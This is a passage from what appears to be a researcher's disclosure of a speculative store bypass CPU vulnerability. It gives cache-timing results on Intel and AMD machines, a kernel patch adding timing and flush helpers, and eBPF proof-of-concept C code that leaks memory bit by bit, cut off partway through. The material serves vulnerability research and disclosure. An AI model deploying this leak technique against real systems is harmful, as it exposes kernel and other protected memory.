results[hits] = res + '0';\r\n hits++;\r\n }\r\n cycles++;\r\n pipeline_flush();\r\n }\r\n pipeline_flush();\r\n#ifdef NO_INTERRUPTS\r\n asm volatile(\"sti\");\r\n#endif\r\n out_ += sprintf(out_, \"%c: %s in %ld cycles (hitrate: %f%%)\\n\",\r\nsecret_read_area[idx], results, cycles, 100*hits/(double)cycles);\r\n }\r\n printf(\"%s\", out);\r\n pipeline_flush();\r\n}\r\n----------------------- END -----------------------\r\n \r\n \r\nResults:\r\n \r\nIn the following, \"SMP off\" means that I have executed this\r\ncommand:\r\n# for file in /sys/devices/system/cpu/cpu*/online; do echo 0 > $file; done\r\n \r\nFor the Intel machines, \"turbo off\" means that I've executed the\r\nfollowing command:\r\n# echo 1 > /sys/devices/system/cpu/intel_pstate/no_turbo\r\n \r\nSkylake laptop, normal:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50\r\n$ ./test\r\n0: 00000000000000000000000000000000 in 61944 cycles (hitrate: 0.051660%)\r\n0: 00000000000000000000000000000000 in 36467 cycles (hitrate: 0.087751%)\r\n0: 00000000000000000000000000000000 in 36788 cycles (hitrate: 0.086985%)\r\n0: 00000000000000000000000000000000 in 36800 cycles (hitrate: 0.086957%)\r\n0: 00000000000000000000000000000000 in 35797 cycles (hitrate: 0.089393%)\r\n1: 11111111111111111111111111111111 in 48923 cycles (hitrate: 0.065409%)\r\n1: 11111111111111111111111111111111 in 44525 cycles (hitrate: 0.071870%)\r\n0: 00000000000000000000000000000000 in 44813 cycles (hitrate: 0.071408%)\r\n1: 11111111111111111111111111111111 in 40625 cycles (hitrate: 0.078769%)\r\n1: 11111111111111111111111111111111 in 40897 cycles (hitrate: 0.078245%)\r\n1: 11111111111111111111111111111111 in 39648 cycles (hitrate: 0.080710%)\r\n0: 00000000000000000000000000000000 in 40737 cycles (hitrate: 0.078553%)\r\n1: 11111111111111111111111111111111 in 37850 cycles (hitrate: 0.084544%)\r\n0: 00000000000000000000000000000000 in 46062 cycles (hitrate: 0.069472%)\r\n1: 11111111111111111111111111111111 in 44929 cycles (hitrate: 0.071223%)\r\n1: 11111111111111111111111111111111 in 37465 cycles (hitrate: 0.085413%)\r\n \r\nSkylake laptop, SMP off, interrupts off, turbo off:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS\r\n$ sudo ./test\r\n0: 00000000000000000000000000000000 in 34697 cycles (hitrate: 0.092227%)\r\n0: 00000000000000000000000000000000 in 32625 cycles (hitrate: 0.098084%)\r\n0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)\r\n0: 00000000000000000000000000000000 in 34680 cycles (hitrate: 0.092272%)\r\n0: 00000000000000000000000000000000 in 32302 cycles (hitrate: 0.099065%)\r\n1: 11111111111111111111111111111111 in 33240 cycles (hitrate: 0.096270%)\r\n1: 11111111111111111111111111111111 in 33738 cycles (hitrate: 0.094849%)\r\n0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n1: 11111111111111111111111111111111 in 32531 cycles (hitrate: 0.098368%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n0: 00000000000000000000000000000000 in 32193 cycles (hitrate: 0.099400%)\r\n1: 11111111111111111111111111111111 in 32167 cycles (hitrate: 0.099481%)\r\n1: 11111111111111111111111111111111 in 31745 cycles (hitrate: 0.100803%)\r\n \r\nHaswell PC, normal:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50\r\n$ ./test\r\n0: 00000000000000000000000000000000 in 119737 cycles (hitrate: 0.026725%)\r\n0: 00000000000000000000000000000000 in 45340 cycles (hitrate: 0.070578%)\r\n0: 00000000000000000000000000000000 in 39127 cycles (hitrate: 0.081785%)\r\n0: 00000000000000000000000000000000 in 39567 cycles (hitrate: 0.080875%)\r\n0: 00000000000000000000000000000000 in 35164 cycles (hitrate: 0.091002%)\r\n1: 11111111111111111111111111111111 in 33770 cycles (hitrate: 0.094759%)\r\n1: 11111111111111111111111111111111 in 36743 cycles (hitrate: 0.087091%)\r\n0: 00000000000000000000000000000000 in 36749 cycles (hitrate: 0.087077%)\r\n1: 11111111111111111111111111111111 in 35686 cycles (hitrate: 0.089671%)\r\n1: 11111111111111111111111111111111 in 35843 cycles (hitrate: 0.089278%)\r\n1: 11111111111111111111111111111111 in 35826 cycles (hitrate: 0.089321%)\r\n0: 00000000000000000000000000000000 in 35302 cycles (hitrate: 0.090646%)\r\n1: 11111111111111111111111111111111 in 34256 cycles (hitrate: 0.093414%)\r\n0: 00000000000000000000000000000000 in 36604 cycles (hitrate: 0.087422%)\r\n1: 11111111111111111111111111111111 in 36795 cycles (hitrate: 0.086968%)\r\n1: 11111111111111111111111111111111 in 37820 cycles (hitrate: 0.084611%)\r\n \r\nHaswell PC, SMP off, interrupts off, turbo off:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=50 -DNO_INTERRUPTS\r\n$ sudo ./test\r\n0: 00000000000000000000000000000000 in 32770 cycles (hitrate: 0.097650%)\r\n0: 00000000000000000000000000000000 in 32776 cycles (hitrate: 0.097632%)\r\n0: 00000000000000000000000000000000 in 32783 cycles (hitrate: 0.097612%)\r\n0: 00000000000000000000000000000000 in 31745 cycles (hitrate: 0.100803%)\r\n0: 00000000000000000000000000000000 in 37455 cycles (hitrate: 0.085436%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n0: 00000000000000000000000000000000 in 39894 cycles (hitrate: 0.080213%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: 11111111111111111111111111111111 in 33845 cycles (hitrate: 0.094549%)\r\n0: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n0: 00000000000000000000000000000000 in 44050 cycles (hitrate: 0.072645%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n \r\nAMD desktop, normal:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99\r\n$ ./test\r\n0: 0000000000000000000000000 in 1000000 cycles (hitrate: 0.002500%)\r\n0: 000000000000000000000 in 1000000 cycles (hitrate: 0.002100%)\r\n0: 00000000000000000000000000000000 in 939816 cycles (hitrate: 0.003405%)\r\n0: 00000000000000000000000000000000 in 903838 cycles (hitrate: 0.003540%)\r\n0: 00000000000000000000000000000000 in 360430 cycles (hitrate: 0.008878%)\r\n1: 11111111111111111111111111111111 in 484242 cycles (hitrate: 0.006608%)\r\n1: 11111111111111111111111111111111 in 331271 cycles (hitrate: 0.009660%)\r\n0: 00000000000000000000000000000000 in 388049 cycles (hitrate: 0.008246%)\r\n1: 11111111111111111111111111111111 in 282588 cycles (hitrate: 0.011324%)\r\n1: 11111111111111111111111111111111 in 359558 cycles (hitrate: 0.008900%)\r\n1: 11111111111111111111111111111111 in 359013 cycles (hitrate: 0.008913%)\r\n0: 0000000000000000000000000000000 in 1000000 cycles (hitrate: 0.003100%)\r\n1: 11111111111111111111111111111111 in 501067 cycles (hitrate: 0.006386%)\r\n0: 00000000000000000000000000000000 in 312420 cycles (hitrate: 0.010243%)\r\n1: 11111111111111111111111111111111 in 784663 cycles (hitrate: 0.004078%)\r\n1: 11111111111111111111111111111111 in 954189 cycles (hitrate: 0.003354%)\r\n \r\nAMD desktop, SMP off, interrupts off:\r\n \r\n$ gcc -o test test.c -Wall -DHIT_THRESHOLD=200 -std=gnu99 -DNO_INTERRUPTS\r\n$ sudo ./test\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: in 1000000 cycles (hitrate: 0.000000%)\r\n0: 00 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n1: 11 in 1000000 cycles (hitrate: 0.000200%)\r\n \r\n \r\n \r\n \r\n \r\n======== assisted BPF PoC ========\r\nThis is a PoC that demonstrates that this issue can potentially be\r\nused to attack the Linux kernel's BPF subsystem.\r\nThis is *NOT* a full exploit against BPF; this is a PoC that requires\r\nkernel patches that permit the PoC to flush kernel memory from inside\r\nBPF and to measure access times to BPF arrays. It seems probable that\r\nthese restrictions could be overcome, but my PoC doesn't do that.\r\n \r\nThe basic idea here is to cause a speculative type confusion:\r\n \r\n1. Store a number N at address A on the stack.\r\n2. Write a pointer P to address A, using a high-latency\r\n expression to compute A.\r\n3. Read a value X from address A, with A specified using a low-latency\r\n expression. Architecturally, X is P; however, microarchitecturally,\r\n X can be N.\r\n4. Use the Spectre/Meltdown gadget to leak the value X points to into\r\n the cache.\r\n \r\nThe attack benefits from the unique property of eBPF that the engine\r\nperforms relatively complicated value tracking, but does not\r\nnormally use the resulting information to modify the code in any way\r\n(e.g. by optimizing things away). It is not clear how applicable this\r\nattack would be to e.g. other scripting languages, or whether it is an\r\nissue for non-scripting code.\r\n \r\nI have only tested this PoC on an Intel Skylake CPU.\r\n \r\n \r\nKernel patch required for the PoC to work (copy attached, so that it\r\napplies cleanly), to be applied to the 4.15.1 stable kernel:\r\n \r\n----------------------- START -----------------------\r\ndiff --git a/include/linux/bpf.h b/include/linux/bpf.h\r\nindex 0b25cf87b6d6..896b4f483fe2 100644\r\n--- a/include/linux/bpf.h\r\n+++ b/include/linux/bpf.h\r\n@@ -591,6 +591,7 @@ extern const struct bpf_func_proto bpf_skb_vlan_push_proto;\r\n extern const struct bpf_func_proto bpf_skb_vlan_pop_proto;\r\n extern const struct bpf_func_proto bpf_get_stackid_proto;\r\n extern const struct bpf_func_proto bpf_sock_map_update_proto;\r\n+extern const struct bpf_func_proto bpf_clflush_mfence_proto;\r\n \r\n /* Shared helpers among cBPF and eBPF. */\r\n void bpf_user_rnd_init_once(void);\r\ndiff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c\r\nindex 3d24e238221e..379dc888cb81 100644\r\n--- a/kernel/bpf/helpers.c\r\n+++ b/kernel/bpf/helpers.c\r\n@@ -179,3 +179,17 @@ const struct bpf_func_proto bpf_get_current_comm_proto = {\r\n .arg1_type = ARG_PTR_TO_UNINIT_MEM,\r\n .arg2_type = ARG_CONST_SIZE,\r\n };\r\n+\r\n+BPF_CALL_1(bpf_clflush_mfence, void *, target) {\r\n+ asm volatile(\"mfence\\n\\tclflush (%0)\\n\\tmfence\"::\"r\"(target):\"memory\");\r\n+ return 0;\r\n+}\r\n+\r\n+const struct bpf_func_proto bpf_clflush_mfence_proto = {\r\n+ .func = bpf_clflush_mfence,\r\n+ .ret_type = RET_INTEGER,\r\n+ /* theoretically permits CLFLUSH on invalid addresses,\r\n+ * but the PoC doesn't do that\r\n+ */\r\n+ .arg1_type = ARG_DONTCARE\r\n+};\r\ndiff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c\r\nindex 5cb783fc8224..2dd9a2a95630 100644\r\n--- a/kernel/bpf/syscall.c\r\n+++ b/kernel/bpf/syscall.c\r\n@@ -605,6 +605,85 @@ static int map_lookup_elem(union bpf_attr *attr)\r\n return err;\r\n }\r\n \r\n+static int map_time_flush_loc(union bpf_attr *attr)\r\n+{\r\n+ void __user *ukey = u64_to_user_ptr(attr->key);\r\n+ void __user *uvalue = u64_to_user_ptr(attr->value);\r\n+ int ufd = attr->map_fd;\r\n+ struct bpf_map *map;\r\n+ void *key, *ptr;\r\n+ struct fd f;\r\n+ int err = 0;\r\n+ u64 delay = 0;\r\n+\r\n+ f = fdget(ufd);\r\n+ map = __bpf_map_get(f);\r\n+ if (IS_ERR(map))\r\n+ return PTR_ERR(map);\r\n+\r\n+ if (!(f.file->f_mode & FMODE_CAN_READ)) {\r\n+ err = -EPERM;\r\n+ goto err_put;\r\n+ }\r\n+\r\n+ if (map->map_type != BPF_MAP_TYPE_ARRAY) {\r\n+ err = -EINVAL;\r\n+ goto err_put;\r\n+ }\r\n+\r\n+ if (attr->flags > 0x100000 || attr->flags >= map->value_size) {\r\n+ err = -EINVAL;\r\n+ goto err_put;\r\n+ }\r\n+ asm volatile(\"lfence\");\r\n+\r\n+ key = memdup_user(ukey, map->key_size);\r\n+ if (IS_ERR(key)) {\r\n+ err = PTR_ERR(key);\r\n+ goto err_put;\r\n+ }\r\n+\r\n+ rcu_read_lock();\r\n+ ptr = map->ops->map_lookup_elem(map, key);\r\n+ if (ptr) {\r\n+ unsigned int t1, t2;\r\n+ ptr = (char*)ptr + attr->flags;\r\n+ asm volatile(\r\n+ \"xor %%r11, %%r11\\n\\t\"\r\n+ \"lfence\\n\\t\"\r\n+ \"rdtscp\\n\\t\"\r\n+ \"mov %%eax, %%ebx\\n\\t\"\r\n+ \"mov (%%rdi), %%r11b\\n\\t\"\r\n+ \"rdtscp\\n\\t\"\r\n+ \"mfence\\n\\t\"\r\n+ \"clflush (%%rdi)\\n\\t\"\r\n+ \"mfence\\n\\t\"\r\n+ ://out\r\n+ \"=a\"(t2),\r\n+ \"=b\"(t1)\r\n+ ://in\r\n+ \"D\"(ptr)\r\n+ ://clobber\r\n+ \"r11\",\r\n+ \"rcx\",\r\n+ \"rdx\",\r\n+ \"memory\"\r\n+ );\r\n+ delay = t2 - t1;\r\n+ }\r\n+ rcu_read_unlock();\r\n+ if (copy_to_user(uvalue, &delay, 8)) {\r\n+ err = -EINVAL;\r\n+ goto free_key;\r\n+ }\r\n+\r\n+free_key:\r\n+ kfree(key);\r\n+err_put:\r\n+ fdput(f);\r\n+ return err;\r\n+}\r\n+\r\n #define BPF_MAP_UPDATE_ELEM_LAST_FIELD flags\r\n \r\n static int map_update_elem(union bpf_attr *attr)\r\n@@ -1713,6 +1792,9 @@ SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr\r\n__user *, uattr, unsigned int, siz\r\n case BPF_MAP_UPDATE_ELEM:\r\n err = map_update_elem(&attr);\r\n break;\r\n+ case 0x13370001:\r\n+ err = map_time_flush_loc(&attr);\r\n+ break;\r\n case BPF_MAP_DELETE_ELEM:\r\n err = map_delete_elem(&attr);\r\n break;\r\ndiff --git a/net/core/filter.c b/net/core/filter.c\r\nindex 1c0eb436671f..e310a345054c 100644\r\n--- a/net/core/filter.c\r\n+++ b/net/core/filter.c\r\n@@ -3347,6 +3347,8 @@ bpf_base_func_proto(enum bpf_func_id func_id)\r\n return &bpf_tail_call_proto;\r\n case BPF_FUNC_ktime_get_ns:\r\n return &bpf_ktime_get_ns_proto;\r\n+ case 4:\r\n+ return &bpf_clflush_mfence_proto;\r\n case BPF_FUNC_trace_printk:\r\n if (capable(CAP_SYS_ADMIN))\r\n return bpf_get_trace_printk_proto();\r\n----------------------- END -----------------------\r\n \r\n \r\nThe PoC:\r\n \r\n----------------------- START -----------------------\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <pthread.h>\r\n#include <assert.h>\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <pthread.h>\r\n#include <errno.h>\r\n#include <limits.h>\r\n#include <stdbool.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <stddef.h>\r\n#include <signal.h>\r\n#include <string.h>\r\n#include <ctype.h>\r\n#include <sys/mman.h>\r\n#include <sys/user.h>\r\n \r\n#define GPLv2 \"GPL v2\"\r\n#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n \r\n \r\n \r\n/* registers */\r\n/* caller-saved: r0..r5 */\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_REG_CTX BPF_REG_6\r\n#define BPF_REG_FP BPF_REG_10\r\n \r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_LD_ABS(SIZE, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n \r\n \r\n \r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n \r\nint array_create(int value_size, int num_entries) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = value_size,\r\n .max_entries = num_entries\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n if (mapfd == -1)\r\n err(1, \"map create\");\r\n return mapfd;\r\n}\r\n \r\nunsigned int array_time_flush_loc(int mapfd, uint32_t idx, uint32_t off) {\r\n uint64_t time;\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&idx,\r\n .value = (uint64_t)&time,\r\n .flags = off,\r\n };\r\n \r\n int res = bpf_(0x13370001, &attr);\r\n if (res)\r\n err(1, \"map flush loc\");\r\n return time;\r\n}\r\n \r\nvoid array_set_dw(int mapfd, uint32_t key, uint64_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n \r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n \r\nint prog_load(struct bpf_insn *insns, size_t insns_count) {\r\n char verifier_log[100000];\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = insns_count,\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)GPLv2,\r\n .log_level = 1,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n int errno_ = errno;\r\n //printf(\"==========================\\n%s==========================\\n\",\r\nverifier_log);\r\n errno = errno_;\r\n if (progfd == -1)\r\n err(1, \"prog load\");\r\n return progfd;\r\n}\r\n \r\nint create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {\r\n int progfd = prog_load(insns, insns_count);\r\n \r\n // hook eBPF program up to a socket\r\n // sendmsg() to the socket will trigger the filter\r\n // returning 0 in the filter should toss the packet\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n return socks[1];\r\n}\r\n \r\nvoid trigger_proc(int sockfd) {\r\n if (write(sockfd, \"X\", 1) != 1)\r\n err(1, \"write to proc socket failed\");\r\n}\r\n \r\nint input_map, leak_map;\r\nint sockfds[16];\r\n \r\nint leak_bit(unsigned long addr, int bit) {\r\n array_set_dw(input_map, 0, addr);\r\n int count_0 = 0, count_1 = 0;\r\n while (count_0 + count_1 < 100) {\r\n array_time_flush_loc(leak_map, 0, 2048+0x1000);\r\n trigger_proc(sockfds[bit+8]);\r\n unsigned int t1 = array_time_flush_loc(leak_map, 0, 2048+0x1000);\r\n \r\n array_time_flush_loc(leak_map, 0, 2048);\r\n trigger_proc(sockfds[bit+0]);\r\n unsigned int t0 = array_time_flush_loc(leak_map, 0, 2048);\r\n \r\n //printf(\"%u %u\\n\", t0, t1);\r\n if (t0 < 50)\r\n count_0++;\r\n if (t1 < 50)\r\n count_1++;\r\n }\r\n printf(\"%d vs %d\\n\", count_0, count_1);\r\n return (count_0 > count_1) ? 0 : 1;\r\n}\r\n \r\nint leak_byte(unsigned long addr) {\r\n int byte = 0;\r\n for (int bit=0; bit<8; bit++) {\r\n byte |= leak_bit(addr, bit)<<bit;\r\n }\r\n return byte;\r\n}\r\n \r\nint main(int argc, char **argv) {\r\n setbuf(stdout, NULL);\r\n input_map = array_create(8, 1);\r\n leak_map = array_create(0x3000, 1);\r\n \r\n if (argc != 3)\r\n errx(1, \"invocation (expects addr and length)\");\r\n \r\n #define BPF_REG_CONFUSED_SLOT BPF_REG_6\r\n #define BPF_REG_SLOW_SLOT BPF_REG_7\r\n #define BPF_REG_CONFUSED_SLOT_ALIAS BPF_REG_8\r\n #define BPF_REG_LEAK_ARRAY BPF_REG_9\r\n \r\n #define BPF_REG_CONFUSED BPF_REG_1\r\n #define BPF_REG_SECRET_VALUE BPF_REG_2\r\n #define BPF_REG_DUMMY_SLOT BPF_REG_3\r\n \r\n for (int i=0; i<16; i++) {\r\n bool dummy_ff = (i >= 8);\r\n int selected_bit = i & 7;\r\n struct bpf_insn insns[] = {\r\n /* setup: write 0x00 or 0xff to -216 to get a big stack\r\nallocation and to prepare dummy */\r\n BPF_ST_MEM(BPF_B, BPF_REG_FP, -216, dummy_ff ? 0x00 : 0xff),\r\n \r\n /* setup: compute stack slot pointers to :\r\n * - type-confused stack slot (at -72)\r\n * - pointer to type-confused stack slot (at -144)\r\n */\r\n BPF_MOV64_REG(BPF_REG_CONFUSED_SLOT, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_CONFUSED_SLOT, -72),\r\n BPF_MOV64_REG(BPF_REG_SLOW_SLOT, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_SLOW_SLOT, -144),\r\n //BPF_MOV64_REG(BPF_REG_0, BPF_REG_FP),\r\n //BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, -216),\r\n \r\n /* write to dummy slot (to make a big stack and to permit later read) */\r\n //BPF_ST_MEM(BPF_DW, BPF_REG_0, 0, 0),\r\n \r\n /* setup: store victim memory pointer in BPF_REG_CONFUSED_SLOT */\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, input_map),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),\r\n BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),\r\n BPF_EXIT_INSN(),\r\n BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_0, 0),\r\n BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT, BPF_REG_0, 0),\r\n \r\n /* setup: spill pointer to type-confused stack slot */\r\n BPF_STX_MEM(BPF_DW, BPF_REG_SLOW_SLOT, BPF_REG_CONFUSED_SLOT, 0),\r\n \r\n /* setup: load pointer to leak area into register */\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, leak_map),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),\r\n BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),\r\n BPF_EXIT_INSN(),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 2048), /* leak_map+2048 */\r\n BPF_MOV64_REG(BPF_REG_LEAK_ARRAY, BPF_REG_0),\r\n \r\n /* CHEATED: fence and flush */\r\n BPF_MOV64_REG(BPF_REG_1, BPF_REG_SLOW_SLOT),\r\n BPF_EMIT_CALL(4/*clflush_mfence*/),\r\n \r\n BPF_MOV64_REG(BPF_REG_DUMMY_SLOT, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_DUMMY_SLOT, -216),\r\n \r\n /* START CRITICAL PATH */\r\n BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,\r\nBPF_REG_SLOW_SLOT, 0), /* high-latency read of slot address */\r\n BPF_STX_MEM(BPF_DW, BPF_REG_CONFUSED_SLOT_ALIAS,\r\nBPF_REG_DUMMY_SLOT, 0), /* bypassed store via high-latency address */\r\n BPF_LDX_MEM(BPF_DW, BPF_REG_CONFUSED, BPF_REG_CONFUSED_SLOT, 0),\r\n \r\n BPF_LDX_MEM(BPF_B, BPF_REG_SECRET_VALUE, BPF_REG_CONFUSED, 0),\r\n BPF_ALU64_IMM(BPF_AND, BPF_REG_SECRET_VALUE, 1<<selected_bit),\r\n/* 0 or 1 */\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_SECRET_VALUE, 12-selected_bit),\r\n/* 0 or 0x1000 */\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_LEAK_ARRAY, BPF_REG_SECRET_VALUE),\r\n BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_LEAK_ARRAY, 0),\r\n /* END CRITICAL PATH */\r\n \r\n BPF_MOV64_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n sockfds[i] = create_filtered_socket_fd(insns, ARRSIZE(insns));\r\n puts(\"BPF PROG LOADED 